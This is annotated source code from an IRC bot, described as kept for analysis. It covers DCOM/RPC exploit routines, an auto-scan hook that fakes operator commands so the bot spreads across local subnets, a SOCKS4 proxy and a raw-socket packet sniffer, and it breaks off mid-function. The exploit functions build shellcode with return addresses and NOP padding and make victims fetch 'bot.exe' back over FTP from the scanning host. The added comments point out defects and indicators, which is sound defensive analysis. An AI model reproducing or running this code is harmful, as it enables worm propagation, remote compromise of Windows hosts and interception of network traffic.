// Self-propagation routine of the bot's "dcom2" scanner (bot source, kept
// here for analysis). Fingerprints the target over RPC, assembles one
// DCE/RPC request (dcom2_request1..4 around a fixed payload buffer), sends
// it after a bind, and returns true only if the target answered the bind
// with DCE_PKT_BINDACK and the request without DCE_PKT_FAULT. Nothing here
// verifies that anything ran on the remote side.
//
// Defender notes: the payload URL points back at this bot's own file
// transfer port (bot_ftrans_port_ftp) to fetch "bot.exe", so the observable
// chain is a bind + single large request on the scanned port followed by an
// outbound FTP connection from the victim to the scanning host.
// Dead code visible in this function: szSCBuf and iSCSize are never used,
// iShellSize/szShellBuf are produced by setup_shellcode_udtf but never
// copied anywhere, and szAssocGroup is filled but never read.
bool CScannerDCOM2::Exploit() {
	char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
	int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
	char *pTemp;

	// Only hosts the RPC fingerprint could classify, and not NT, are attempted.
	int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
	if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;

	// Address the victim is told to connect back to: the bot's public hostname
	// when this bot is on a private net and the target is not, otherwise the
	// bot's local address. The user:pass part reads "*****:*****" in this copy.
	CString sURL;
	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	// iShellSize is computed but szShellBuf is never used below (dead code).
	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
	iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);

	// Payload buffer: a copy of dcom2_shellcode_buf with two regions patched.
	// Both memcpy calls below target DCOM2_SCBUF_OFFSET_SC, so the adduser
	// bytes overlay the loader bytes copied just before them. iLoadSize ends
	// up equal to sizeof(dcom2_shellcode_buf); nothing checks that this or
	// the patched offsets fit inside szLoadBuf (4096 bytes).
	memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser) );
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
	iLoadSize=iPos; iPos=0;

	// Build the request: request1 + request2 + payload + request3 + request4.
	// No check that the total stays within szReqBuf (4096 bytes).
	memcpy(szReqBuf+iPos, dcom2_request1, sizeof(dcom2_request1)-1 ); iPos+=sizeof(dcom2_request1)-1;
	memcpy(szReqBuf+iPos, dcom2_request2, sizeof(dcom2_request2)-1 ); iPos+=sizeof(dcom2_request2)-1;
	memcpy(szReqBuf+iPos, szLoadBuf, iLoadSize ); iPos+=iLoadSize;
	memcpy(szReqBuf+iPos, dcom2_request3, sizeof(dcom2_request3)-1 ); iPos+=sizeof(dcom2_request3)-1;
	memcpy(szReqBuf+iPos, dcom2_request4, sizeof(dcom2_request4)-1 ); iPos+=sizeof(dcom2_request4)-1;
	iReqSize=iPos; iPos=0;
	pTemp=szReqBuf+sizeof(dcom2_request1)-1;

	// Fill the request with the right sizes: length fields at fixed byte
	// offsets are adjusted by the payload length. These are unaligned writes
	// through a char* reinterpreted as unsigned long — undefined behaviour in
	// C++ and only meaningful on the little-endian target with a 4-byte long
	// that this code presumably assumes.
	*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
	*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2;
	pTemp=szReqBuf;
	*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
	*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
	*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
	*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
	*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
	*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
	*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
	*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;

	char szAssocGroup[4];

	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort))
		// Connect failed, exit
		return false;

	// Send the bind string
	if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1)) { m_sSocket.Disconnect(); return false; }

	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; }

	// Check for DCE_PKT_BINDACK (packet type byte at offset 2)
	if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }

	// Store the association group for later usage (never actually read here)
	memcpy(szAssocGroup, szRecvBuf+20, 4);

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }

	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; }

	// Check for DCE_PKT_FAULT; anything else is reported as success
	if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect();

	return true;
}
// Start-up auto-scan hook. In release builds, when scan_auto is enabled
// (and, on WIN32, scan_auto_nb), it resolves the bot's own address and
// hands the scanner synthetic channel messages that look as if an operator
// had typed a ".scan.*" command, so the bot starts sweeping its own /24 and
// then /16 with no C2 instruction at all. Debug builds only contain the
// optional SCANTEST single-target path.
//
// Defender notes: the fabricated messages carry fixed identity strings
// ("AutoScanner", "AutoScanner.Net", "DebugScanner") that work as static
// indicators. The netbios block still assigns sCmd "scan.dcom" while its
// chat string says ".scan.netbios" (copy-paste leftover); which of the two
// HandleCommand keys on is not visible in this file. hEnt from
// gethostbyname is dereferenced without a NULL check, so a failed lookup
// crashes the bot at start-up. Each HandleCommand call is repeated 15 and
// 25 times; what a repeated call does (extra scan threads, presumably) is
// not visible here.
void CScannerAuto::Init() {
#ifndef _DEBUG
	if(g_cMainCtrl.m_cBot.scan_auto.bValue) {
		char szLocalIp[32]={0};
		char szName[255]={0};
		unsigned long lLocalIp;
		CMessage mFakeMsg;
		int i=0;
		hostent *hEnt;

		// Local address of this host, as dotted string for the command text.
		// hEnt is not checked for NULL.
		gethostname(szName, sizeof(szName));
		hEnt=gethostbyname(szName);
		memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
		strcpy(szLocalIp, inet_ntoa(to_in_addr(lLocalIp)));

		// Fake an operator command for the local /24, silent (no channel echo).
		mFakeMsg.bNotice=false;
		mFakeMsg.bSilent=true;
		mFakeMsg.sChatString.Format(".scan.dcom %s/24 1000000", szLocalIp);
		mFakeMsg.sCmd.Assign("scan.dcom");
		mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
		mFakeMsg.sHost.Assign("AutoScanner.Net");
		mFakeMsg.sIdentd.Assign("AutoScanner");
		mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
		mFakeMsg.sSrc.Assign("AutoScanner");
		for(i=0;i<15;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);

		// Then the local /16 with a larger count.
		mFakeMsg.sChatString.Format(".scan.dcom %s/16 10000000", szLocalIp);
		for(i=0;i<25;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);
	}
#ifdef WIN32
	if(g_cMainCtrl.m_cBot.scan_auto_nb.bValue) {
		char szLocalIp[32]={0};
		char szName[255]={0};
		unsigned long lLocalIp;
		CMessage mFakeMsg;
		int i=0;
		hostent *hEnt;

		// Same address resolution as above, same missing NULL check.
		gethostname(szName, sizeof(szName));
		hEnt=gethostbyname(szName);
		memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
		strcpy(szLocalIp, inet_ntoa(to_in_addr(lLocalIp)));

		// Chat string says netbios but sCmd is still "scan.dcom".
		mFakeMsg.bNotice=false;
		mFakeMsg.bSilent=true;
		mFakeMsg.sChatString.Format(".scan.netbios %s/24 1000000", szLocalIp);
		mFakeMsg.sCmd.Assign("scan.dcom");
		mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
		mFakeMsg.sHost.Assign("AutoScanner.Net");
		mFakeMsg.sIdentd.Assign("AutoScanner");
		mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
		mFakeMsg.sSrc.Assign("AutoScanner");
		for(i=0;i<15;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);

		mFakeMsg.sChatString.Format(".scan.netbios %s/16 10000000", szLocalIp);
		for(i=0;i<25;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);
	}
#endif // WIN32
#else
//#define SCANTEST
#ifdef SCANTEST
	// Debug-only single-target test against a hard-coded address.
	CMessage mFakeMsg;
	mFakeMsg.bNotice=false;
	mFakeMsg.bSilent=true;
	mFakeMsg.sChatString.Format(".scan.dcom2 90.0.1.55/32 100");
	mFakeMsg.sCmd.Assign("scan.dcom2");
	mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
	mFakeMsg.sHost.Assign("DebugScanner.Net");
	mFakeMsg.sIdentd.Assign("DebugScanner");
	mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
	mFakeMsg.sSrc.Assign("DebugScanner");
	g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);
#endif // SCANTEST
#endif // _DEBUG
}
// Listener loop of the bot's SOCKS4 proxy module. Announces the start on
// IRC, binds m_iLocalPort on all interfaces (ssin.sin_addr stays zero from
// the memset), then accepts clients while m_pRedirect->m_bRedirecting is
// set, handing each accepted socket to a freshly allocated
// CRedirectSOCKS_Thread. On exit it closes the listener and announces the
// unload on IRC.
//
// Notes for the reader:
//  - accept() blocks, so m_bRedirecting is only re-examined after the next
//    client connects; clearing the flag alone does not end the loop.
//  - listen() is re-issued on every iteration; harmless but unnecessary.
//  - The socket() failure check compares against SOCKET_ERROR while the
//    cleanup compares against INVALID_SOCKET. On Winsock both compare equal
//    to an all-ones SOCKET, so it works, but the two should agree.
//  - The thread object is created with new and never deleted here;
//    ownership presumably passes to the thread itself (not visible).
// Defender note: a new listening TCP port plus the IRC text
// "[%s] Starting Socks4 Proxy on port %d." are the observable artefacts.
void CRedirectSOCKS::StartRedirect() {
	g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "[%s] Starting Socks4 Proxy on port %d.", \
		m_sRedirectName.CStr(), m_iLocalPort);

	m_sListenSocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(m_sListenSocket==SOCKET_ERROR) return;

	// Listener address: any interface, port m_iLocalPort.
	sockaddr_in ssin, cssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family=AF_INET;
	ssin.sin_port=htons(m_iLocalPort);
	socklen_t clen=sizeof(cssin);
	if(bind(m_sListenSocket, (sockaddr*)&ssin, sizeof(ssin))!=0) { xClose(m_sListenSocket); return; }

	while(m_pRedirect->m_bRedirecting) {
		if(listen(m_sListenSocket, 10)==SOCKET_ERROR) { Sleep(250); continue; }

		// Blocks until a client connects; the loop condition is not
		// re-checked until then.
		int sClientSocket=accept(m_sListenSocket, (sockaddr*)&cssin, &clen);
#ifdef DBGCONSOLE
		g_cMainCtrl.m_cConsDbg.Log(1, "CRedirectSOCKS(0x%8.8Xh): Accepted connection from %s...\n", this, inet_ntoa(to_in_addr(cssin.sin_addr.s_addr)));
#endif

		if(sClientSocket!=SOCKET_ERROR && sClientSocket!=0) {
			// One worker per client; the worker receives the socket and the
			// IRC reply context so it can report on its own.
			CRedirectSOCKS_Thread *pTemp=new CRedirectSOCKS_Thread;
			pTemp->m_pRedirect=m_pRedirect;
			pTemp->m_pRedirSOCKS=this;
			pTemp->m_iLocalPort=m_iLocalPort;
			pTemp->m_sClientSocket=sClientSocket;
			pTemp->m_sReplyTo.Assign(m_sReplyTo);
			pTemp->m_bSilent=m_bSilent;
			pTemp->m_bNotice=m_bNotice;
			pTemp->Start();
		} else {
			// accept() failed: leave the loop and tear the listener down.
			break;
		}
	}

	if(m_sListenSocket!=INVALID_SOCKET) xClose(m_sListenSocket);

	g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "[%s] Unloaded proxy on %d.", \
		m_sRedirectName.CStr(), m_iLocalPort);
}
// Self-propagation routine of the bot's "dcom" scanner (bot source, kept
// here for analysis). Two transports, selected by the target port:
// 135/1025 use a plain TCP socket (bind, then one request); 445 uses the
// \\host\pipe\epmapper named pipe reached through a null session (Windows
// builds only — elsewhere the 445 case is empty and the function returns
// false). Both paths build the same request: request1..4 wrapped around
// shellcode_start + a NOP run + the download payload produced by
// setup_shellcode_udtf for an FTP URL that points back at this bot.
// A true return only means the transport accepted the data (on the pipe
// path: that the follow-up ReadFile failed); remote execution is never
// verified.
//
// Defender notes / defects visible here:
//  - The NOP-padding loop mallocs and frees szTemp every iteration without
//    using it, and never checks the growing buffer against szSCBuf's 4096
//    bytes; since it only waits for iSCSize%16==12 it runs at most 15 times.
//  - On the TCP path the reply to the bind is read but never examined.
//  - On the pipe path szInBuf (100000 bytes) is freed only on the success
//    path; both early returns leak it. CloseHandle is also called on hFile
//    when CreateFile returned INVALID_HANDLE_VALUE.
//  - Length patching writes unsigned long through a char* at fixed offsets:
//    unaligned type punning, undefined in C++, only meaningful on the
//    little-endian 4-byte-long target this was presumably written for.
//  - The TCP and pipe branches duplicate the whole request-building
//    sequence verbatim.
//  - Observable chain per target: bind + one large request on 135/1025, or
//    a null-session pipe open of epmapper on 445, followed by an outbound
//    FTP connection from the victim to the scanning host for "bot.exe".
bool CScannerDCOM::Exploit() {
	switch(m_sSocket.m_sPort) {
	case 135:
	case 1025:
		{
			char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
			int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
			char *pTemp;

			// Fingerprint over RPC, fall back to SMB; NT is never attempted.
			int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
			if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
			if(iHostOS==OS_WINNT) return false;

			// Address the victim is told to connect back to (see file header
			// note); the user:pass part reads "*****:*****" in this copy.
			CString sURL;
			if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
			else
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
			iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);

			// Build a buffer with the shellcode
			memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
			memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
			memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
			iSCSize=iPos; iPos=0;

			// Prepend NOPs as long as shellcode doesn't fit RPC packet format.
			// szTemp is allocated and freed without ever being used; no bound
			// against sizeof(szSCBuf).
			while(iSCSize%16!=12) {
				char *szTemp=(char*)malloc(iSCSize+1);
				iNOPSize++;
				memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
				memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
				memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
				iSCSize=iPos; iPos=0;
				free(szTemp);
			}

			// Set the return address: picked from my_offsets by fingerprinted OS
			if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
			else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

			// Build the request; no check that it fits in szReqBuf (4096 bytes)
			memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
			memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
			memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
			memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
			memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
			iReqSize=iPos;
			pTemp=szReqBuf+sizeof(request1)-1;

			// Fill the request with the right sizes (unaligned unsigned long
			// writes at fixed offsets, see header note)
			*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
			*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2;
			pTemp=szReqBuf;
			*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
			*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
			*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
			*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
			*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
			*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
			*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
			*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;

			// Connect to the server
			if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort))
				// Connect failed, exit
				return false;

			// Send the bind string
			if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }

			// Read reply (result and content are ignored on this path)
			m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);

			// Send the evil request
			if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }

			// Read reply; any received data counts as success
			if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }

			// Close the socket that was once funky fresh
			m_sSocket.Disconnect();

			return true;
		}
		break;
	case 445:
		{
#ifdef _WIN32
			NETRESOURCEW nr;
			bool bRetVal=false;

			// Null session to the target's IPC share is a prerequisite for the pipe.
			if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
			else {
				int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
				if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);

				char szPipePath[MAX_PATH];
				sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
				HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
					NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
				if(hFile!=INVALID_HANDLE_VALUE) {
					SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);

					char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
					int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
					char *pTemp;

					// Same URL selection and request construction as the TCP path.
					CString sURL;
					if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
					else
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
					iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);

					// Build a buffer with the shellcode
					memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
					memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
					memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
					iSCSize=iPos; iPos=0;

					// Prepend NOPs as long as shellcode doesn't fit RPC packet format
					// (same unused szTemp allocation and missing bound as above)
					while(iSCSize%16!=12) {
						char *szTemp=(char*)malloc(iSCSize+1);
						iNOPSize++;
						memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
						memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
						memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
						iSCSize=iPos; iPos=0;
						free(szTemp);
					}

					// Set the return address
					if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
					else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

					// Build the request
					memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
					memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
					memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
					memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
					memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
					iReqSize=iPos;
					pTemp=szReqBuf+sizeof(request1)-1;

					// Fill the request with the right sizes
					*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
					*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2;
					pTemp=szReqBuf;
					*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
					*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
					*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
					*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
					*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
					*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
					*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
					*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;

					unsigned long lWritten;
					// 100000-byte heap buffer; freed only on the success path below.
					char *szInBuf=(char*)malloc(100000);
					memset(szInBuf, 0, 100000);

					// Send the bind string over the pipe and check the reply's
					// packet type byte; 0x0C is a magic literal here, presumably
					// the same value as DCE_PKT_BINDACK used on the TCP path.
					DWORD dwRead;
					TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
					if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }

					// Send the evil request (szInBuf leaks on this early return too)
					if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }

					// A failed ReadFile is treated as success; a successful read as failure.
					if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true;
					else bRetVal=false;

					free(szInBuf);
				}
				// Reached with hFile==INVALID_HANDLE_VALUE as well.
				CloseHandle(hFile);
				CloseNullSession(m_sSocket.m_szHost);
			}
			return bRetVal;
#endif // _WIN32
		}
		break;
	default:
		return false;
		break;
	}
	return false;
}
// Thread body of the bot's packet sniffer. Copies the SNIFFER parameters
// out of *param, flags gotinfo so the creator may release the struct, opens
// a raw IP socket bound to the local address, switches it to SIO_RCVALL
// (capture of every IP packet the interface sees; typically needs
// administrator rights) and then loops forever: for each TCP packet
// (proto 6) it extracts ports and addresses, flattens CR/LF in the payload,
// and posts payloads matching the IsSuspicious* classifiers to IRC.
//
// Notes for the reader:
//  - while(1) has no exit condition, so the cleanup after the loop and the
//    trailing return 0 after ExitThread are unreachable; the thread ends
//    only with the process or by external termination.
//  - Header parsing assumes fixed-size IP and TCP headers
//    (sizeof(*ipHeader), sizeof(*tcpHeader)); packets carrying IP or TCP
//    options get a wrong payload offset.
//  - The payload is handled as a NUL-terminated C string: binary payloads
//    are cut at the first zero byte, strlen is recomputed on every loop
//    iteration, and a packet filling all 65535 bytes has no terminator.
//  - iRead is never inspected; a failed recv leaves the zeroed buffer,
//    whose proto byte is 0, so it is merely skipped.
//  - hEnt from fgethostbyname is dereferenced without a NULL check.
//  - szSrcHost/szDestHost are 2048-byte stack buffers for a dotted quad,
//    written with sprintf instead of a bounded copy.
//  - Traffic involving port 25 or 110 is skipped entirely; port 80 traffic
//    only reaches the HTTP and VULN classifiers.
// Defender notes: a raw socket with SIO_RCVALL and the IRC report prefix
// containing "SNIFFER" are the observable artefacts of this module.
DWORD WINAPI SnifferThread(LPVOID param) {
	SNIFFER sniff = *((SNIFFER *)param);
	SNIFFER *sniffs = (SNIFFER *)param;
	sniffs->gotinfo = TRUE;

	char sendbuf[IRCLINE];
	int sock;
	sockaddr_in addr_in;
	hostent *hEnt;
	IPHEADER *ipHeader;
	tcp_hdr_sniffer *tcpHeader;
	char *szPacket;
	char szName[255]={0};
	unsigned long lLocalIp;

	// Bind address: the host's own first resolved address, any port.
	// hEnt is not checked for NULL.
	addr_in.sin_family=AF_INET;
	addr_in.sin_port=0;
	addr_in.sin_addr.s_addr=0;
	fgethostname(szName, sizeof(szName));
	hEnt=fgethostbyname(szName);
	memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
	addr_in.sin_addr.s_addr=lLocalIp;

	sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
	if(sock==INVALID_SOCKET) return NULL;

	if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
		sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);
		fclosesocket(sock);
		clearthread(sniff.threadnum);
		ExitThread(0);
	}

	// Promiscuous capture of all IP traffic on the bound interface.
	int optval=1;
	DWORD dwBytesRet;
	if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) {
		sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);
		fclosesocket(sock);
		clearthread(sniff.threadnum);
		ExitThread(0);
	}

	char szRecvBuf[65535];
	ipHeader=(IPHEADER*)szRecvBuf;
	int iRead;

	// No exit condition: runs until the process ends.
	while(1) {
		// Clear the buffer
		memset(szRecvBuf, 0, sizeof(szRecvBuf));
		iRead=0;

		// Read the raw packet (return value not checked)
		iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);

		// Process if its a TCP/IP packet
		if(ipHeader->proto==6) {
			// Assumes a header without IP options.
			tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
			int iSrcPort, iDestPort;
			char szSrcHost[2048], szDestHost[2048];
			iSrcPort=ntohs(tcpHeader->th_sport);
			iDestPort=ntohs(tcpHeader->th_dport);

			// Mail ports are skipped on either side.
			if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25) {
				sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
